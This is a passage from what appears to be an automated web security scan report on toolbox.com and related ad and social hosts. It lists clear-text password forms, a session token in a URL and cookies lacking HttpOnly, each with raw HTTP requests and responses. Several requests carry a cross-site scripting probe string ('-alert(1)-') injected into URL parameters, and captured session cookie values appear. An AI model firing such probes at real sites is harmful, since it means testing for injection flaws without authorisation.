<form name="aspnetForm" method="post" action="/contact/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$m$txtSignin_Password" type="password" id="ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.88. http://www.toolbox.com/it/advertising/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toolbox.com
Path:   /it/advertising/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /it/advertising/ HTTP/1.1
Host: www.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26971
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Advertis
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/it/advertising/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.89. http://www.toolbox.com/news/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toolbox.com
Path:   /news/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /news/ HTTP/1.1
Host: www.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21896
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ugckar45ukzeih55dzbcsf45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox.com
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/news/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$m$txtSignin_Password" type="password" id="ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

5. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://infotechtoolbox.tt.omtrdc.net
Path:   /m2/infotechtoolbox/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /m2/infotechtoolbox/mbox/standard?mboxHost=it.toolbox.com&mboxSession=1296053537181-721966&mboxPage=1296053537181-721966&screenHeight=1200&screenWidth=1920&browserWidth=1155&browserHeight=1012&browserTimeOffset=-360&colorDepth=16&mboxCount=1&mbox=blogs_cta_start_a_blog&mboxId=0&mboxTime=1296031938515&mboxURL=http%3A%2F%2Fit.toolbox.com%2Fblogs%2Fppmtoday%2Fventure-and-gender-43847%3Fee209'-alert(1)-'185afe72fe1%3D1&mboxReferrer=http%3A%2F%2Fburp%2Fshow%2F4&mboxVersion=39 HTTP/1.1
Host: infotechtoolbox.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://it.toolbox.com/blogs/ppmtoday/venture-and-gender-43847?ee209'-alert(1)-'185afe72fe1=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 177
Date: Wed, 26 Jan 2011 14:51:58 GMT
Server: Test & Target

mboxFactories.get('default').get('blogs_cta_start_a_blog',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1296053537181-721966.17");

6. Cookie without HttpOnly flag set  previous  next
There are 38 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



6.1. http://hs.maas360.com/white-paper/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://hs.maas360.com
Path:   /white-paper/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /white-paper/ HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 26 Jan 2011 14:55:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=6de0a61392ea135c6980b8417bddae51; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

6.2. http://twitter.com/toolboxdotcom  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /toolboxdotcom

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /toolboxdotcom HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 26 Jan 2011 14:56:29 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296053789-52552-6574
ETag: "cba3bfc96bf68c050adb0ae164dc8175"
Last-Modified: Wed, 26 Jan 2011 14:56:29 GMT
X-Runtime: 0.01600
Content-Type: text/html; charset=utf-8
Content-Length: 51936
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296053788039947; path=/; expires=Wed, 02-Feb-11 14:56:28 GMT; domain=.twitter.com
Set-Cookie: guest_id=129605378903672234; path=/; expires=Fri, 25 Feb 2011 14:56:29 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWY4MmYzNTRlZWE2MzBkYjZlMzAxMGM2YmExZmIzMTAwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIbmHTwi0B--5f068f484769ee483f9eaf437005d73e90b46f16; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

6.3. http://twitter.com/toolboxforit  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /toolboxforit

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /toolboxforit HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 26 Jan 2011 14:56:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296053787-90115-59528
ETag: "88e9aa64188f9d64f88986da2628b13f"
Last-Modified: Wed, 26 Jan 2011 14:56:27 GMT
X-Runtime: 0.01067
Content-Type: text/html; charset=utf-8
Content-Length: 45652
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296053787142478; path=/; expires=Wed, 02-Feb-11 14:56:27 GMT; domain=.twitter.com
Set-Cookie: guest_id=129605378737979704; path=/; expires=Fri, 25 Feb 2011 14:56:27 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTljM2MwNTc3NjdjNTdhMzAyZDA4OTRlY2U5NzliMjM0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI9VrTwi0B--bba18e9789744f8014c5ff57c43fcea71113a57e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

6.4. http://www.indeed.com/ads/apiresults.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.indeed.com
Path:   /ads/apiresults.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ads/apiresults.js HTTP/1.1
Host: www.indeed.com
Proxy-Connection: keep-alive
Referer: http://it.toolbox.com/blogs/ppmtoday/why-should-i-change-40067?28cff'-alert(1)-'27a3eb6d893=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 26 Jan 2011 14:52:46 GMT
Server: Apache
Set-Cookie: CTK=15n1cvupf0k2i6j3; Domain=.indeed.com; Expires=Mon, 31-Jan-2028 09:41:17 GMT; Path=/
Set-Cookie: DCT=4; Expires=Wed, 26-Jan-2011 16:52:46 GMT; Path=/
Set-Cookie: JSESSIONID=E595C4662B9D3A1137FBF2D239C5326B.usA_iad-web5; Path=/
ETag: W/"206-1295567380000"
Last-Modified: Thu, 20 Jan 2011 23:49:40 GMT
Cache-Control: max-age=43200
Expires: Thu, 27 Jan 2011 02:52:46 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript
Set-Cookie: NSC_vt_jbe=ffffffffaec9d30645525d5f4f58455e445a4a423660;expires=Wed, 26-Jan-2011 15:52:46 GMT;path=/;httponly
Content-Length: 206

function indeed_clk(a,sig) { var hr = a.href; var si = hr.indexOf('&jsa='); if (si > 0) return; var jsh = hr + '&jsa=' + sig; if ( jsh.indexOf('&inchal') == -1 ) jsh += '&inchal=apiresults'; a.href =
...[SNIP]...

6.5. http://cio.ittoolbox.com/directory/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /directory/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /directory/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 52564
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=el0hjp55tk5oie55qdseux55; path=/; HttpOnly
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.ittoolbox.com; expires=Tue, 26-Apr-2011 13:49:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Manageme
...[SNIP]...

6.6. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fit.toolbox.com%2fblogs%2fppmtoday%2fventure-and-gender-43847 HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lf8gij0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt1181qqxzt1181qqxzt1181qqxzt1181qq; vstcnt=3lebnns021l034e2061201181qq4fhux122q000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru0000000000000004esx7120104tej0r013ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv1a96l00i0p01050410h; orblb=2lfk1rn012dh10u0100000; rdrlst=20z0s7dpletz4d0000000e0p01050410eo2ylebnns0000000i0p01050410h10flfk1rn000000030p01050310310elfk1rn000000030p010503103mmnlebnns0000000i0p01050410hxo1lebnns0000000i0p01050410hx1blebnns0000000i0p01050410heh5lf17qf0000000a0p01050410a6bylemlne0000000g0p01050410gw3clebnns0000000i0p01050410h7gmlebnns0000000i0p01050410hjv6lebnns0000000i0p01050410hj4ilew2e20000000c0p01050410cxthlebnns0000000i0p01050410hfullf8gij000000060p0105041060c9lfk1rn000000030p010503103jillebnns0000000i0p01050410hfuqlegh2b0000000h0p01050410hb6mlf17qk000000090p010504109mz1lebnns0000000i0p01050410hcajlfk1rn000000030p010503103p7vlebnns0000000i0p01050410h7vglfk1rn000000030p010503103xvslebnns0000000i0p01050410h10rlfjpei000000040p010504104xuklebnns0000000i0p01050410hx1jlebnns0000000i0p01050410hjk7lebnns0000000i0p01050410hcbnlfk1rn000000030p010503103yiplebnns0000000i0p01050410hyh0lebnns0000000i0p01050410hxwflebnns0000000i0p01050410he4vlebnns0000000i0p01050410hjwblfk1rn000000030p010503103xwblebnns0000000i0p01050410h; sglst=2140s8dtletz4d0pqa500a0l000400100a70lebnns181qq00e0l00040010061gletz4d0pqa500a0l0004001005b0lf17qo000000080p010504108ag2leqh190vft400f0p01050410f82gletz4d0pqa500a0l0004001009zdlebnns181qq00e0l00040010082hlebnns181qq00i0p01050410h5q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000040p010504104820lebnns181qq00e0l000400100b0olfjpei000000040p010504104ab4lebnns181qq00i0p01050410h9szlebnns181qq00i0p01050410h8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b15fs200h0p01050410hal1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l0004001005q8lebnns181qq00e0l0004001007y2lebnns181qq00e0l0004001008bgletz4d0pqa500a0l000400100b0clfjpei000000040p010504104b08lfjpei000000040p01050410440slebnns181qq00e0l00040010045mlfdxmc000000050p010504105a97lebnns181qq00e0l000400100ah4lebnns181qq00e0l0004001003s4letz4d0pqa500a0l00040010040uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Mon, 25-Jul-2011 14:52:01 GMT; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv1b9mx00j0q01050510i; Domain=media6degrees.com; Expires=Mon, 25-Jul-2011 14:52:01 GMT; Path=/
Set-Cookie: orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Mon, 25-Jul-2011 14:52:01 GMT; Path=/
Set-Cookie: rdrlst=2100so2ylebnns0000000j0q01050510i7dpletz4d0000000f0q01050510f10flfk1rn000000040q010504104mmnlebnns0000000j0q01050510i10elfk1rn000000040q01050410410rlfmxap000000010q010501101x1blebnns0000000j0q01050510ixo1lebnns0000000j0q01050510ieh5lf17qf0000000b0q01050510b6bylemlne0000000h0q01050510hw3clebnns0000000j0q01050510i7gmlebnns0000000j0q01050510ijv6lebnns0000000j0q01050510ij4ilew2e20000000d0q01050510dxthlebnns0000000j0q01050510ifullf8gij000000070q0105051070c9lfk1rn000000040q010504104jillebnns0000000j0q01050510ifuqlegh2b0000000i0q01050510ib6mlf17qk0000000a0q01050510amz1lebnns0000000j0q01050510icajlfk1rn000000040q010504104p7vlebnns0000000j0q01050510i7vglfk1rn000000040q010504104xvslebnns0000000j0q01050510i10rlfjpei000000050q010505105xuklebnns0000000j0q01050510ijk7lebnns0000000j0q01050510ix1jlebnns0000000j0q01050510iyiplebnns0000000j0q01050510icbnlfk1rn000000040q010504104xwflebnns0000000j0q01050510iyh0lebnns0000000j0q01050510ie4vlebnns0000000j0q01050510ixwblebnns0000000j0q01050510ijwblfk1rn000000040q010504104; Domain=media6degrees.com; Expires=Mon, 25-Jul-2011 14:52:01 GMT; Path=/
Set-Cookie: sglst=2140s8dtletz4d0pqa500a0l00040010061gletz4d0pqa500a0l000400100a70lebnns181qq00e0l0004001005b0lf17qo000000090q01050510982gletz4d0pqa500a0l000400100ag2leqh190wg9g00g0q01050510g82hlebnns181qq00j0q01050510i9zdlebnns181qq00e0l0004001005q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000050q010505105820lebnns181qq00e0l000400100b0olfjpei000000050q010505105ab4lebnns181qq00j0q01050510i9szlebnns181qq00j0q01050510i8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b16g8e00i0q01050510ial1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l000400100b0clfjpei000000050q0105051058bgletz4d0pqa500a0l0004001007y2lebnns181qq00e0l0004001005q8lebnns181qq00e0l000400100b08lfjpei000000050q01050510540slebnns181qq00e0l0004001003s4letz4d0pqa500a0l000400100ah4lebnns181qq00e0l000400100a97lebnns181qq00e0l00040010045mlfdxmc000000060q01050510640uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Mon, 25-Jul-2011 14:52:01 GMT; Path=/
Location: http://tag.admeld.com/match?admeld_adprovider_id=304&external_user_id=6ch47d7o8wtv&_mydatasegment=foo&expiration=30days
Content-Length: 0
Date: Wed, 26 Jan 2011 14:52:01 GMT


6.7. http://ds.addthis.com/red/psi/sites/it.toolbox.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/it.toolbox.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/it.toolbox.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fit.toolbox.com%2Fblogs%2Fppmtoday%2Fventure-and-gender-43847&ref=http%3A%2F%2Fburp%2Fshow%2F4&1yua7sg HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295903322.60|1295452270.19F|1293848200.66; dt=X; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 274
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 26 Jan 2011 14:52:01 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 25 Feb 2011 14:52:01 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296053521.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 25-Jan-2013 14:47:11 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 26 Jan 2011 14:52:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 26 Jan 2011 14:52:01 GMT
Connection: close

_ate.ad.hpr({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fit.toolbox.com%2fblogs%2fppmtoday%2fventure-and-gender-43847
...[SNIP]...

6.8. http://it.toolbox.com/blogs/ppmtoday/change-origins-39674  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/change-origins-39674

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ppmtoday/change-origins-39674 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68764
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Change Orig
...[SNIP]...

6.9. http://it.toolbox.com/blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ppmtoday/does-john-stewart-run-a-cmm-level-5-shop-42066 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67441
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Does John S
...[SNIP]...

6.10. http://it.toolbox.com/blogs/ppmtoday/dx3-data-driven-decisions-41860  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/dx3-data-driven-decisions-41860

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/ppmtoday/dx3-data-driven-decisions-41860 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73174
